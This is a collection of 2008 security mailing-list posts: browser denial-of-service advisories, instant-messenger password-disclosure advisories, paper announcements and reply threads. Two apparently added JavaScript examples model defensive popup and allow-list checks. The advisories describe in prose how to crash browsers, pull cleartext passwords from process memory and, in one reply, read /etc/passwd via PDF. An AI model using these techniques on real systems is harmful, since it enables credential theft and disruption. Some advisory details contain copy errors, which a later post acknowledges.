Mozilla Firefox is vulnerable to user interface event dispatcher null pointer dereference denial of service attacks. A dynamically created dispatched event leads to a Firefox crash when it is called directly or in a defined loop with a number of generated user interface events. The resulting crash reports:

Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0007
Crashed Thread: 0

Thread 0 Crashed:
0 libxpcom_core.dylib nsTArray_base::Length() const + 11 (nsTArray.h:66)
1 libgklayout.dylib nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray) + 261 (nsContentUtils.cpp:4083)

This security issue is the result of an unhandled exception caused by a null pointer dereference.

Links:
http://www.secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

Proof of Concept:
http://www.secniche.org/moz303/index.html

Detection:
SecNiche confirmed this vulnerability affects Mozilla Firefox on the Microsoft Windows XP SP2 platform. The versions tested are: Mozilla 3.0.3 - 1.9.0 Branch

Disclosure Timeline:
Disclosed: 28 September 2008
Release Date: 28 September 2008

Vendor Response:
Mozilla confirms this vulnerability.

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory : Opera Window Object Suppressing Remote Denial of Service
Opera Window Object Suppressing Remote Denial of Service.

Version Affected: Opera 9.52

Severity: High

Description:
The Opera browser is vulnerable to a window object based denial of service attack. Opera fails to apply a check when the window.close() function is called in a number of dynamically generated events. The function is called in a suppressed manner and kills the parent window directly by default, which makes it vulnerable to a denial of service attack. This security issue is the result of a design flaw in the browser. Scripts must not close windows that were not opened by script, if script-specific code is designed. There must be a parent window confirmation check prior to closing a window.

Proof of Concept:
http://www.secniche.org/opera952/index.html

Links:
http://www.secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Opera on the Microsoft Windows XP SP2 platform. The versions tested are: Opera 9.52

Disclosure Timeline:
Disclosed: 28 September 2008
Release Date: 28 September 2008

Vendor Response:
Vulnerability reported to Opera. Bug ID 365663

Credit: Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory: Google Chrome Window Object Suppressing Remote Denial of Service.
Google Chrome Window Object Suppressing Remote Denial of Service.

*Version Affected:*
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

*Severity:* High

*Description:* The Google Chrome browser is vulnerable to a window object based denial of service attack. The Google Chrome fails to sanitize a check when the window.close() function is called in body upload. The function is called in a suppressed manner and kills the parent window directly by default, which makes it vulnerable to a denial of service attack. This inability of Google Chrome diversifies the attack pattern as a number of events can execute this function without a security check prompting a user to allow the event to trigger. This security issue is a result of a design flaw in the browser as the function shows stringent behavior in many cases. Scripts must not close windows that were not opened by script, if script specific code is designed. There must be a parent window confirmation check prior to the close of a window.

*POC:* http://www.secniche.org/gws/poc.html

/NOTE: If this page is opened in Google Chrome, you need to open this POC in a new window to see the killing of the parent window. You can even use a Sub Tab in this./

*Links:*
http://www.seniche.org/advisory.html
http://www.evilfingers.com/advisory/

*Detection:* SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are:
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

*Disclosure Timeline:*
Disclosed: 25 September 2008
Release Date: September 27, 2008

*Vendor Response:* Google acknowledges this vulnerability as a security bug and a fix will be released soon.

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.
*Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.*

*Version Affected:*
Chrome/0.2.149.30
Chrome/0.2.149.29

*Severity:* High

*Description:* The Google Chrome browser is vulnerable to a memory exhaustion based denial of service which can be triggered remotely. The vulnerability triggers when a Carriage Return (\r\n\r\n) is passed as an argument to the window.open() function. It makes the Google Chrome generate a number of windows at the same time, thereby leading to memory exhaustion. The behavior can be easily checked by looking at the task manager, as in no time the memory usage rises high. The problem lies in the handling of the object and its value returned by the javascript function. Once it is triggered the pop ups start generating. The Google Chrome browser generates object windows continuously, thereby affecting the memory of the resultant system. Probably it can be crashed within no time. User interaction is required in this.

*Proof of Concept:* http://www.secniche.org/gds

*Links:*
http://secniche.org/gcrds.html
http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php

*Detection:* SecNiche confirmed this vulnerability affects Google Chrome on the Microsoft Windows XP SP2 platform. The versions tested are:
Chrome/0.2.149.30
Chrome/0.2.149.291

*Disclosure Timeline:*
Disclosed: 22 September 2008
Release Date: September 24, 2008

*Vendor Response:* Google acknowledges this vulnerability and a fix will be released soon.

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
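The Opera and Google Chrome window-object advisories above ask for two things a browser should enforce: a script must not be able to close a window it did not open without a confirmation step, and a loop of window.open() calls must not be able to create windows without bound. The block below is an added example, not code from the advisories or from any browser; it models both checks in plain JavaScript so they run under Node without a browser. The script-closable rule follows the HTML specification's definition (an auxiliary context opened by script, or a top-level context with a single history entry); the popup budget tied to a fresh user activation, and the names `isScriptClosable`, `guardedClose`, `PopupGate` and `simulateOpenLoop`, are constructed for this example.

```javascript
'use strict';

// Minimal model of a browsing context. `openedByScript` and `historyLength`
// are the two facts the script-closable rule depends on.
function isScriptClosable(ctx) {
  if (ctx.isAuxiliary && ctx.openedByScript) return true;
  if (ctx.isTopLevel && ctx.historyLength === 1) return true;
  return false;
}

// Guarded close: report what happened instead of silently killing the window.
// `confirmFn` stands in for the parent-window confirmation the advisories ask
// for before a window that script did not open goes away.
function guardedClose(ctx, confirmFn) {
  if (!isScriptClosable(ctx)) return 'ignored';            // not closable by script at all
  if (!ctx.openedByScript && !confirmFn()) return 'cancelled';
  ctx.closed = true;
  return 'closed';
}

// Popup budget bound to user activation (constructed policy for this example):
// window.open() is honoured only while a click/keypress is fresh, and only a
// bounded number of times per activation, so a loop of opens cannot exhaust
// memory with new windows.
class PopupGate {
  constructor({ maxPerActivation = 1, activationWindowMs = 5000, now = Date.now } = {}) {
    this.maxPerActivation = maxPerActivation;
    this.activationWindowMs = activationWindowMs;
    this.now = now;
    this.lastActivation = -Infinity;
    this.opensSinceActivation = 0;
    this.opened = [];
  }

  // Called by the embedder on a genuine user gesture.
  userActivation() {
    this.lastActivation = this.now();
    this.opensSinceActivation = 0;
  }

  // Called in place of window.open(); returns a window model or null when blocked.
  open(url) {
    const fresh = this.now() - this.lastActivation <= this.activationWindowMs;
    if (!fresh || this.opensSinceActivation >= this.maxPerActivation) {
      return null;                                         // no fresh activation or budget spent
    }
    this.opensSinceActivation += 1;
    const win = { url, isAuxiliary: true, isTopLevel: false, openedByScript: true, historyLength: 1, closed: false };
    this.opened.push(win);
    return win;
  }
}

// Constructed scenario in the shape the advisory describes: one user click,
// then a loop that tries to open many windows with the "\r\n\r\n" argument.
function simulateOpenLoop(attempts = 1000) {
  let t = 0;                                               // fake clock, advanced per attempt
  const gate = new PopupGate({ maxPerActivation: 1, now: () => t });
  gate.userActivation();
  let opened = 0;
  for (let i = 0; i < attempts; i++) {
    if (gate.open('\r\n\r\n') !== null) opened += 1;
    t += 1;
  }
  return { attempted: attempts, opened };
}
```

With the gate in place the loop of 1000 attempts yields exactly one window, and a top-level window with real history is never closable by script, which is the behaviour the advisories' "parent window confirmation check" recommendation amounts to.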
Hi Two Points to consider
Hi Bugtraq

Two points I want to make.

1. The version number in the pidgin advisory should be 2.5.1
2. In the skype explanation, instead of the pidgin process the skype process should be there.

I have corrected this on the reference sites. Just want to let you know. If any issues please let me know.

Regards
Re: Pidgin IM Client Password Disclosure Vulnerability.
Quark IT - Hilton Travis wrote:

The latest version of Pidgin - 2.5.1 - was released on 2008-08-31. This must be an ancient version you've got here!

--
http://blog.hiltontravis.com/
Regards,
Hilton Travis
Phone: +61 (0)7 3105 9101 (Brisbane, Australia)
Phone: +61 (0)419 792 394
Manager, Quark IT http://www.quarkit.com.au
Quark Group http://www.quarkgroup.com.au
Microsoft SBSC PAL (Australia) http://www.sbscpal.com/
War doesn't determine who is right. War determines who is left.
This document and any attachments are for the intended recipient only. It may contain confidential, privileged or copyright material which must not be disclosed or distributed. Quark Group Pty. Ltd. T/A Quark Automation, Quark AudioVisual, Quark IT

-Original Message-
From: Aditya K Sood [mailto:[EMAIL PROTECTED]
Sent: Wednesday, 17 September 2008 10:41 PM
To: bugtraq@securityfocus.com
Subject: Pidgin IM Client Password Disclosure Vulnerability.

Pidgin IM Client Password Disclosure Vulnerability.

*Version Affected:* 0.7.10 Unicode / Previous versions can be affected.

*Release Date:* 11 September 2008

*About:* Pidgin is a graphical modular messaging client based on libpurple which is capable of connecting to AIM, MSN, Yahoo!, XMPP, ICQ, IRC, SILC, SIP/SIMPLE, Novell GroupWise, Lotus Sametime, Bonjour, Zephyr, MySpaceIM, Gadu-Gadu, and QQ all at once. It is written using GTK+.

*Description:* The pidgin client inherits a client side password disclosure vulnerability. The credentials used to connect to the required service, i.e. username and password, are not encrypted properly. The credentials can be extracted in clear text by dumping the process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process pidgin.exe.

*Proof of Concept:*
http://evilfingers.com/advisory/pidgin_password_disc_vuln.pdf
http://secniche/advisory/pidgin_vul.pdf

*Links:*
http://secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

Hi

I have tested the 2.5.1 version. The template was wrongly constructed in the version number. Anyway I have changed the things. Thanks for mentioning the construct. I appreciate that.

Regards
Skype IM Client Password Disclosure Vulnerability.
Skype IM Client Password Disclosure Vulnerability.

*Version Affected:* Skype 3.8 / Previous versions can be affected.

*Release Date:* 11 September 2008

*Description:* The skype client inherits a client side password disclosure vulnerability. The credentials used to connect to the required service, i.e. username and password, are not encrypted properly. The credentials can be extracted in clear text by dumping the process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process skype.exe. The skype uses the skype.exe and skypepm.exe processes while communicating. The skype.exe dumps the password in clear text.

*Proof of Concept:*
http://evilfingers.com/advisory/skype_pass_dis_vul.pdf
http://secniche.org/advisory/skype_vul.pdf

*Links:*
http://secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Miranda IM Client Password Disclosure Vulnerability.
Miranda IM Client Password Disclosure Vulnerability.

*Version Affected:* 0.7.10 Unicode / Previous versions can be affected.

*Release Date:* 11 September 2008

*About:* Miranda IM is a multi-protocol instant messaging client for Windows. Very light on system resources and extremely fast, Miranda IM requires no installation and can be made to fit on a single floppy disk or USB drive. Featuring a powerful plugin-based framework and boasting over 350 plugins, Miranda IM is one of the most flexible and customizable messaging clients on the planet.

*Description:* The Miranda client inherits a client side password disclosure vulnerability. The credentials used to connect to the required service, i.e. username and password, are not encrypted properly. The credentials can be extracted in clear text by dumping the process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process miranda32.exe.

*Proof of Concept:*
http://evilfingers.com/advisory/miranda_im_mem_pass_disc.pdf
http://secniche/advisory/miranda_vul.pdf

*Links:*
http://secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Pidgin IM Client Password Disclosure Vulnerability.
Pidgin IM Client Password Disclosure Vulnerability.

*Version Affected:* 0.7.10 Unicode / Previous versions can be affected.

*Release Date:* 11 September 2008

*About:* Pidgin is a graphical modular messaging client based on libpurple which is capable of connecting to AIM, MSN, Yahoo!, XMPP, ICQ, IRC, SILC, SIP/SIMPLE, Novell GroupWise, Lotus Sametime, Bonjour, Zephyr, MySpaceIM, Gadu-Gadu, and QQ all at once. It is written using GTK+.

*Description:* The pidgin client inherits a client side password disclosure vulnerability. The credentials used to connect to the required service, i.e. username and password, are not encrypted properly. The credentials can be extracted in clear text by dumping the process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process pidgin.exe.

*Proof of Concept:*
http://evilfingers.com/advisory/pidgin_password_disc_vuln.pdf
http://secniche/advisory/pidgin_vul.pdf

*Links:*
http://secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

*Credit:* Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
[Mlabs] Dissecting Internals of Windows XP Svchost : Reverse Engineering Stature
Hi all

This is the reverse engineering layout of Svchost internals.

Category: Reverse Engineering Analysis.

The paper solely relates to the core internals that build up the Windows XP Svchost. The Svchost internals have not been disseminated into informative elements yet. I have found only one or two analyses but that won't satisfy my views regarding XP Svchost. The anatomy of Svchost has got complexity in its own terms. This pushes me to write a specific analysis over it. The analysis provides a structural design with concept wise dissection. The point is to understand the hidden artifacts and how they affect the working aspect of the prime service host controller. Every process is disseminated into a primary process and secondary process. In terms related to the operating system there is a parent process and its child. If one looks at the implementation scenario then child processes are undertaken as threads internally. The kernel level implementation is subjugated like this. The XP Svchost runs as threads under the services process.

http://mlabs.secniche.org/winxp_svchost.html
http://mlabs.secniche.org/papers/Win_Xp_Svc_Int.pdf

Regards
Aks aka 0kn0ck
http://mlabs.secniche.org | http://www.secniche.org
[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM
Hi

I have released a core research paper on SIP comprising payload problems and attack vectors. This research paper lays stress on the potential weaknesses present in SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol. The payloads constitute the request vectors. The protocol inherits well defined security procedures and implementation objects. The security model is hierarchical and is diverged in every working layer of SIP from top to bottom. SIP features can be exploited easily if a definitive attack base is subjugated. We will discuss the inherited flaws and methods to combat against predefined attacks. The payloads have to be scrutinized at the network level. It is critical because payloads are considered as infection bases to infect networks. The pros and cons will be enumerated from a security perspective.

You can download the paper at:
http://mlabs.secniche.org/papers/Scruti_SIP_Payloads.pdf

Regards
Aks aka 0kn0ck
Re: 0day: PDF pwns Windows
pdp (architect) wrote:

http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place.

My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.

cheers

Hi

Your point is right. But there are a number of factors other than this in exploiting pdf in another sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restrictions on READ in PDF in most of the versions. Only outbound data is filtered to some extent. You can even read the /etc/passwd file from inside of a PDF. Other infection vectors include infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research features everything regarding this and the issue you have already discussed.

Regards
Aks
http://ww.secniche.org
[Paper] The Anatomy of Third Party Pop Up Attacks.
Hi

This article deals with the latest third party popup attacks that are performed by an attacker from the rogue and vulnerable links of web sites to circumvent the normal functioning on the web. The target website always seems to be the liable web provider from where the popup attacks are possible. It also discusses other problems related with Pop Ups.

You can find it at:
http://www.secniche.org/papers/Analogy_of_Popups.pdf
http://www.secniche.org/paper.html

Regards
Aks
http://www.secniche.org
SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

Dated : 15 August 2007

Severity : Critical

Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popups in the running instance of Internet Explorer. An attacker can easily exploit it by enabling a browser to run a malicious script in the context of Internet Explorer. The script manipulates the registry entries for specific websites through Javascript. It adds fake or malicious websites as allowed websites in the pop up blocker. The cause: a user visiting an untrusted website or any other malicious cause.

Detail Advisory :
http://www.secniche.org/advisory/Internet_Pop_Phish_Dos_Adv.pdf
http://www.secniche.org/adv.html

Proof of Concept : Level 1 Infection Test
http://www.secniche.org/misc/ie_pop_by_level1_test.zip

Test runs fine locally as well as with Web server [IIS] automated server object calling. Infection through Active X Object.

Regards
AKS aka 0kn0ck
http://www.secniche.org
Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability
Debasis Mohanty wrote:

No offence intended but if you take a little more effort of validating your work before posting publicly then you can save yourself from embarrassment. I don't see anything in the script that can bypass zone security and run successfully from internet zone. I am sure you have tested it locally and drawn the conclusion that the script can execute from internet zone. To test the script from internet zone, you need to upload it to a webserver and try accessing via browser. Any VB/Java script will run from local security with a charm but if you can make it run from internet zone (without a prompt) then you found a holy grail. However I don't see anything in the script which can defeat zone security and access the registry, hence no vulnerability.

The best way to validate your work before posting publicly is, run it through the vendor or third party security sites like secunia or idefence. This would certainly save you from public embarrassment.

-d

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Aditya K Sood
Sent: 17 August 2007 09:07
To: [EMAIL PROTECTED]; bugtraq@securityfocus.com; [EMAIL PROTECTED]; Steven M. Christey
Subject: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

Dated : 15 August 2007

Severity : Critical

Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popups in the running instance of Internet Explorer. An attacker can easily exploit it by enabling a browser to run a malicious script in the context of Internet Explorer. The script manipulates the registry entries for specific websites through Javascript. It adds fake or malicious websites as allowed websites in the pop up blocker. The cause: a user visiting an untrusted website or any other malicious cause.

Detail Advisory :
http://www.secniche.org/advisory/Internet_Pop_Phish_Dos_Adv.pdf
http://www.secniche.org/adv.html

Proof of Concept : Level 1 Infection Test
http://www.secniche.org/misc/ie_pop_by_level1_test.zip

Test runs fine locally as well as with Web server [IIS] automated server object calling. Infection through Active X Object.

Regards
AKS aka 0kn0ck
http://www.secniche.org

Hi

/Any VB/Java script will run from local security with a charm but if you can make it run from internet zone (without a prompt) then you found a holy grail. However I don't see anything in the script which can defeat zone security and access registry, hence no vulnerability./

No problem. I think every script that runs from the Internet zone prompts, Mr. Debasish. Most of the time locally it prompts too. I hope you can find any method that an Active X control does not prompt. You are good at bypassing things.

/I don't see anything in the script that can bypass zone security and run successfully from internet zone. I am sure you have tested it locally and drawn conclusion that the script can execute from internet zone. To test the script from internet zone, you need to upload it to a webserver and try accessing via browser./

I think I have told the practical citation clearly. The automation object is required.

/The best way to validate your work before posting publicly is, run it through the vendor or third party security sites like secunia or idefence. This would certainly save you from public embarrassment./

Embarrassment. Nothing lies beneath it. Critically you are too much of your own in deciding.

Regards
AKS
[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON
hi

A specific white paper has been released comprising specific application problems related to Bison. You can look into it.

http://www.secniche.org/papers/Ser_Insec_Bison.pdf

Regards
AKS
http://www.secniche.org
[CVE-2007-3816][Advisory] JWIG Context-Dependent Template Calling Dos
Advisory : JWIG Context-Dependent Template Calling Dos

CVE-2007-3816

Dated : 12 July 2007

Vulnerable Software : BRICS, JWIG

Severity : Intermediate

Explanation: JWIG might allow context-dependent attackers to cause a denial of service (service degradation) via loops of references to external templates.

For more details :
http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf

Links:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3816
http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-3816

Regards
Aditya K Sood
SecNiche Security
WhitePapers By SecNiche Security
Hi all

The whitepapers regarding Java Web Security Technologies have been released.

1. JNLP Security Convergence : http://www.secniche.org/papers/JNLP_Security_Con.pdf
2. Hack Annotations in JWIG : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf

Regards
Aditya K Sood
SecNiche Security
Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing.
Advisory : Internet Explorer Zone Domain Specification Dos and Page Suppressing

Severity : Intermediate

Version : IE 6.0 - 7.0

Dated : 18 June 2007

Explanation: The vulnerability is present in the handling of domain names with different parameters [sub domains] when specified in the Intranet zone and Restricted zone with different characters [*, .]. The Internet Explorer shows weird behavior in the opening of those websites. The problem occurs in the loading of those websites, thereby resulting in DoS through the browser. The problem occurs in resolving domain names in different zones by the explorer. It can be launched remotely by a malicious attacker by exploiting this vulnerable behavior through a rogue script and registry functions. The problem persists if rogue entries or manipulated entries are subjected into various zones. So when a new instance of IE is loaded, the registry entries are triggered up, thereby resulting in security impacts. The website page gets suppressed. The page gets hung for some time, thereby showing a delay in loading of the website and affecting the CPU load.

Vendor Status : Reported To Microsoft Security Center.

Solution By Microsoft Security Center:
1. Avoid visiting untrusted Websites.
2. Script Restriction should be applied.

- Aditya K Sood
http://www.secniche.org
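Both Internet Explorer advisories above come down to per-site exception lists that a script can grow or malform: the pop-up blocker advisory describes fake sites being added to the allowed-sites list, and the zone advisory describes Intranet/Restricted zone entries containing "*" and "." characters that hang the browser. A defender can catch both by auditing those lists against a known-good baseline and rejecting entries that are not well-formed hostnames. The block below is an added example, not code from the advisories or from Microsoft; it works on plain arrays (exported from wherever the browser stores its lists, which this example does not read) so it runs offline under Node. The hostname rules, the single leading "*." wildcard form, the function names `siteEntryProblem`, `auditSiteList` and `runSampleAudit`, and the sample lists are all constructed for this example.

```javascript
'use strict';

const MAX_HOST_LEN = 253;                       // DNS name length limit
// One DNS label: 1-63 chars, alphanumerics and hyphens, no leading/trailing hyphen.
const LABEL_RE = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

// Accept a dotted hostname, optionally with one leading "*." wildcard label
// (the only wildcard form this example's policy permits). Returns null when
// the entry is acceptable, otherwise a short reason string.
function siteEntryProblem(entry) {
  if (typeof entry !== 'string' || entry.length === 0) return 'empty';
  if (entry.length > MAX_HOST_LEN) return 'too long';
  if (/\s/.test(entry)) return 'whitespace';
  let host = entry;
  if (host.startsWith('*.')) host = host.slice(2);
  if (host.includes('*')) return 'wildcard in non-leading position';
  if (host.length === 0) return 'bare wildcard';
  const labels = host.split('.');               // "a..b" yields an empty label
  if (labels.length < 2) return 'not a dotted hostname';
  for (const label of labels) {
    if (!LABEL_RE.test(label)) return `bad label "${label}"`;
  }
  return null;
}

// Compare the live list against a known-good baseline. Added entries are the
// signal for a script silently allow-listing sites; invalid entries are the
// signal for the malformed zone patterns the advisory says trigger the hang.
function auditSiteList(baseline, current) {
  const base = new Set(baseline.map(e => e.toLowerCase()));
  const live = new Set(current.map(e => e.toLowerCase()));
  const added = [...live].filter(e => !base.has(e));
  const removed = [...base].filter(e => !live.has(e));
  const invalid = [...live]
    .map(e => ({ entry: e, problem: siteEntryProblem(e) }))
    .filter(x => x.problem !== null);
  return { added, removed, invalid, clean: added.length === 0 && invalid.length === 0 };
}

// Constructed sample lists: the baseline a defender recorded, and a live list
// that has grown by one plausible entry and three malformed ones.
const BASELINE_ALLOW_LIST = ['www.example.com', '*.example.net'];
const CURRENT_ALLOW_LIST = [
  'www.example.com', '*.example.net',
  'updates.example.org',                        // added, well-formed: review it
  '*.*.test',                                   // wildcard beyond the leading label
  'bad..host.test',                             // empty label from a doubled dot
  'localhost',                                  // not a dotted hostname
];

function runSampleAudit() {
  return auditSiteList(BASELINE_ALLOW_LIST, CURRENT_ALLOW_LIST);
}
```

Running `runSampleAudit()` reports four added entries, of which three are also flagged invalid; the well-formed addition is the one that needs a human to decide whether it belongs on the list. The same validator applied before an entry is written would reject the malformed patterns outright.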
Project CERA Is Up Again : Secniche Initiative
Hi all

The project CERA is up again. CERA : Cutting Edge Research Arena. You can look into it.

http://cera.secniche.org

Regards
Aditya K Sood aka Zeroknock
http://www.secniche.org
MLabs is Shifted Fully : SecNiche Initiative
Hi all

The Mlabs have been fully shifted to the secniche domain. You can check it:

http://mlabs.secniche.org

Regards
Aditya K Sood aka Zeroknock
http://www.secniche.org
SECNICHE : Dwelling Security is On the Run
Hi all

The Sec Niche : dwelling Security portal is up fully. It's a personal working arena and consultancy domain of mine. You can check it:

http://www.secniche.org

A number of papers have been transferred to secniche and many more will be added as soon as they are ready. So run a bit.

Aditya K Sood aka Zeroknock
http://www.secniche.org